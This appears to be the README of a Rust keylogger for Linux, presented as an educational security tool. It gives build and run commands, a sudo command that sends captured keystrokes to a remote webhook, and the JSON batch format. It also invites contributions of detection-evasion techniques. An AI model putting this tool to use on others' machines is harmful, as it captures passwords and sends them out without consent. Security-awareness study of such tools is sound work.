An educational keylogger written in Rust for learning about input device monitoring and security awareness.
This tool is for educational purposes only. Unauthorized use of keyloggers may be illegal in your jurisdiction. Always obtain proper authorization before using this tool. The authors are not responsible for misuse or damage caused by this program.
This project demonstrates how keyloggers work at a low level on Linux systems using the evdev interface. It's designed to help security professionals, students, and developers understand:
- How input devices are monitored at the kernel level
- How keystrokes are captured and logged
- The importance of physical security
- Why endpoint protection and monitoring are critical
- Real-time Keystroke Logging: Captures all keyboard input from connected devices
- USB Keyboard Support: Automatically detects and monitors USB keyboards
- Multiple Keyboard Support: Monitors all keyboards simultaneously
- Webhook Integration: Send keystroke data to a remote endpoint for analysis
- Efficient Batching: Groups keystrokes to minimize network overhead
The keylogger works by:
- Scanning
/dev/input/event*devices for keyboards - Using Linux's evdev interface to read raw input events
- Mapping key codes to human-readable characters
- Logging keystrokes to a file with timestamps
- Optionally sending batched keystrokes to a webhook endpoint
- Rust (1.70 or later)
- Linux with evdev support
- Root/sudo access (required to read input devices)
# Clone the repository
git clone https://github.com/LangerSword/rust-key.git
cd rust-key
# Build the release binary
cargo build --releaseThe compiled binary will be at target/release/rust-key.
# Run with local logging only
sudo ./target/release/rust-key
# Run with webhook support
sudo ./target/release/rust-key https://your-webhook-url.com/endpointKeystrokes are logged to keylog.txt in the current directory with this format:
=== Keylogger Started at 2026-01-01 12:00:00 ===
Locale: en_US.UTF-8
[2024-01-01 12:00:05.123] [USB Keyboard] Key: h
[2024-01-01 12:00:05.234] [USB Keyboard] Key: e
[2024-01-01 12:00:05.345] [USB Keyboard] Key: l
[2024-01-01 12:00:05.456] [USB Keyboard] Key: l
[2024-01-01 12:00:05.567] [USB Keyboard] Key: o
For convenience, we provide wrapper scripts:
Prompts for confirmation and configuration before starting:
./run.shThis will:
- Ask for confirmation
- Request webhook URL (optional)
- Start the keylogger with sudo
- Create a stop script
When a webhook URL is provided, keystrokes are sent in batches as JSON POST requests:
{
"keystrokes": [
{
"timestamp": "2024-01-01 12:00:05.123",
"device": "USB Keyboard",
"key": "h"
},
{
"timestamp": "2024-01-01 12:00:05.234",
"device": "USB Keyboard",
"key": "e"
}
]
}Batching configuration:
- Batch size: 20 keystrokes per request
- Timeout: 2 seconds (sends partial batch if no new keys)
Demonstrate to users why:
- Physical security matters (unattended computers are vulnerable)
- Screen locks are important
- Two-factor authentication provides additional protection
- Trusted devices and environments are critical
Use in authorized security assessments to:
- Test endpoint detection and response (EDR) tools
- Validate monitoring and alerting systems
- Assess physical security controls
- Demonstrate attack techniques to clients
Learn about:
- Linux input subsystem and evdev
- Kernel-level input device monitoring
- Network protocols and data exfiltration techniques
- Detection and prevention mechanisms
- The keylogger captures ALL keyboard input, including passwords
- Log files contain sensitive information and should be secured
- Webhook data is transmitted over the network - use HTTPS
- Always delete or encrypt logs when no longer needed
- Never use this on systems you don't own or have permission to monitor
- Be aware of legal implications in your jurisdiction
- Implement proper authorization checks in production tools
- Consider privacy laws (GDPR, CCPA, etc.)
Press Ctrl+C if running in foreground, or use the generated stop script:
./stop_keylogger.sh- Uses
evdevcrate to access input devices - Non-blocking event loop with epoll for efficiency
- Supports multiple simultaneous keyboards
- Smart shift handling for capitalization
- UTF-8 locale support (en_US.UTF-8)
Supports:
- Letters (a-z, capitalized with Shift)
- Numbers (0-9, with shift symbols: !, @, #, etc.)
- Special keys (Enter, Tab, Space, Backspace, etc.)
- Punctuation (with shift variants)
- Arrow keys
- Function keys (F1-F12)
The program requires access to /dev/input/event* devices. You can either:
-
Run with sudo (simplest):
sudo ./target/release/rust-key
-
Add user to input group (more secure):
sudo usermod -a -G input $USER # Log out and log back in ./target/release/rust-key
- ✅ Linux - Fully supported (Arch, Ubuntu, Debian, Fedora, etc.)
- 🚧 Windows - Dependencies included, implementation in progress
- 🚧 macOS - Dependencies included, implementation in progress
rust-key/
├── src/
│ ├── main.rs # Entry point and argument parsing
│ ├── linux.rs # Linux/evdev implementation
│
├── run.sh # Interactive launcher script
├── Cargo.toml # Rust dependencies
└── README.md # This file
Contributions are welcome! Areas for contribution:
- Complete Windows implementation using winapi
- Complete macOS implementation using Core Graphics
- Add encryption for log files
- Support for additional keyboard layouts
- Configuration file support
- Detection evasion techniques (for educational purposes)
MIT License - See LICENSE file for details
LangerSword
- GitHub: https://github.com/LangerSword/rust-key
- Issues: https://github.com/LangerSword/rust-key/issues
Remember: This tool is powerful. Use it responsibly and ethically. Always obtain proper authorization before monitoring any system.